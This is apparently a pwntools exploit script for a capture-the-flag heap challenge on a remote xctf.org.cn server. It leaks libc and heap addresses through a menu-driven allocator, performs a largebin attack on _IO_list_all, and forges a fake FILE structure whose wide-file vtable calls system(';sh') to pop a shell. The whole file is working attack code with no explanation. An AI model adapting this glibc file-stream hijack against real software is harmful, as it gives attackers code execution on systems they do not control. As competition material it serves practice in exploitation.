1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104
| from pwn import * context(os='linux', arch='amd64', log_level='debug') context.terminal = ['tmux', 'sp', '-h'] local = 0 elf = ELF('./pwn') if local: p = process('./pwn') libc = ELF('./libc.so.6') else: p = remote("pwn-7e15560965.challenge.xctf.org.cn", 9999, ssl=True) libc = ELF('./libc.so.6')
sd = lambda s : p.send(s) sl = lambda s : p.sendline(s) sa = lambda n,s : p.sendafter(n,s) sla = lambda n,s : p.sendlineafter(n,s) rc = lambda n : p.recv(n) rl = lambda : p.recvline() ru = lambda s : p.recvuntil(s) ra = lambda : p.recvall() ia = lambda : p.interactive() uu32 = lambda data : u32(data.ljust(4, b'\x00')) uu64 = lambda data : u64(data.ljust(8, b'\x00'))
def lg(s): success("%s >> 0x%x" % (s, eval(s)))
def bk(addr): gdb.attach(p,"b *"+str(hex(addr)))
def debug(addr,PIE=True): if PIE: text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16) gdb.attach(p,'b *{}'.format(hex(text_base+addr))) else: gdb.attach(p,"b *{}".format(hex(addr)))
def cmd(op): sla(">",str(op))
def add(index,size): cmd(1) sla("[+] input your index",str(index)) sla("[+] input your size",str(size))
def edit(index,content): cmd(2) sla("[+] input your index",str(index)) sa("[+] input your content",content)
def free(index): cmd(3) sla("[+] input your index",str(index))
def show(index): cmd(4) sla("[+] input your index",str(index))
add(8, 0x508) add(0, 0x510) add(1, 0x500) add(2, 0x520) add(3, 0x500) free(2) add(4, 0x530)
show(2) rl() large = uu64(rc(6)[-6:]) libc_base = large - 0x670 - libc.sym['_IO_2_1_stdin_'] lg('libc_base')
_IO_list_all = libc_base + libc.sym['_IO_list_all'] io_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps'] system = libc_base + libc.sym['system']
edit(2, b'A' * 0x10) show(2) ru('A'*0x10) heap = uu64(rc(6)[-6:]) lg('heap')
free(0) edit(2, p64(large) + p64(large) + p64(heap) + p64(_IO_list_all - 0x20))
add(5, 0x550)
chunk_addr = heap - 0xa30 edit(8, b'A' * 0x500 + p32(0xfffff7f5) + b';sh\x00')
fake_io_file = p64(0)*2 + p64(1) + p64(2) fake_io_file = fake_io_file.ljust(0xa0 - 0x10, b'\x00') + p64(chunk_addr + 0x100) fake_io_file = fake_io_file.ljust(0xc0 - 0x10, b'\x00') + p64(0xffffffffffffffff) fake_io_file = fake_io_file.ljust(0xd8 - 0x10, b'\x00') + p64(io_wfile_jumps) fake_io_file = fake_io_file.ljust(0x100 - 0x10 + 0xe0, b'\x00') + p64(chunk_addr + 0x200) fake_io_file = fake_io_file.ljust(0x200 - 0x10, b'\x00') + p64(0)*13 + p64(system)
edit(0, fake_io_file)
cmd('5')
ia()
|